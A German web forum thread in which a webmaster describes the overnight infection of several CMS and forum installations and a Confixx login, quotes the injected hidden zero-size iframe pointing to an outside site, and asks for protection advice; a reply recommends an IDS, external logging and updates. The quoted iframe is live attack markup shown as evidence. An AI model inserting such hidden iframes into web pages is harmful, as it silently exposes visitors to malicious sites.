Wurm legt ganzen Webspace lahm

Mein Webspace erlag letzter Nacht einer "Wurm-Attacke" oder was immer das war.
So gegen 5.00 Uhr morgens entdeckte ich beim installieren eines neuen CMS (e107) einige Ungereimtheiten beim installieren.
Im ACP bekam ich die Meldung, dass 2 Files in einem Ordner waren, die da nicht hingehören.

Beim genaueren hinsehen machte sich schon das ausmaß der Zerstörung sichtbar.

In 2 CMS (e107 Mainseite und Subdomain), sowie in 3 Woltlab Burning Boards 2.3.6 pl1 (acp htaccess) waren mit folgendem code verseucht:

Code:
html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

Der code ist c.a. 10 mal "eingebaut"

Habe 2 Stunden die Serverlogfiles durchsucht, obs Zugriffe auf eine evtl. installierte Shell gab.
Also ich mich ins confixx einloggen wollte (so gegen 10 Uhr heute morgen), musste ich feststellen, dass sogar der Login darin infiziert war.

Meine Frage jetzt - welche Möglichkeiten habe ich um mich gegen solche Angriffe zu schützen.
Kann es sein, dass "der Wurm" evtl. über eine eingeschleuste Shell auf den Webspace kam?
Der ganze Server scheint infiziert zu sein (habe ja wie gesagt nur Webspace).
Global_Register ist Serverseitig auf off gestellt und beim überprüfen des Stammverzeichnisses mit einer c99 Shell wurde der status secure angezeigt.

Eine wirklich ärgerliche Sache, die mir echt auf den Magen schlägt ( und auf meine Schlafgewohnheiten, bin immmer noch wach ... :( )
 
Hallo,
das Beste ist eine (externe) IDS und ein externer Logfile-Server. Mit diesen beiden Mitteln kann man eigentlich sehr schnell ausmachen, was die Ursache dafür war (sofern man es nicht mit einem sehr guten Cracker zu tun hat), woher er kam, welche Lücken er ausgenutzt hat etc.

Da du aber nur Webspace hast, wird das wohl schwer.
Naja sonst evt. mal die PHP Version überprüfen, ob es die neuste ist, weil der März (?) ja der Month of PHP Bugs war, und evt. fährst du noch mit einer alten, unsicheren Version.

Dann als nächstest überprüfen, ob dass CMS, die Boards, Confixx und ähnliches Lücken aufweisen die bekannt sind und evt. auf den neusten Stand bringen.


PS: Was macht man denn schon um 5 Uhr morgens??
 
Zurück
Oben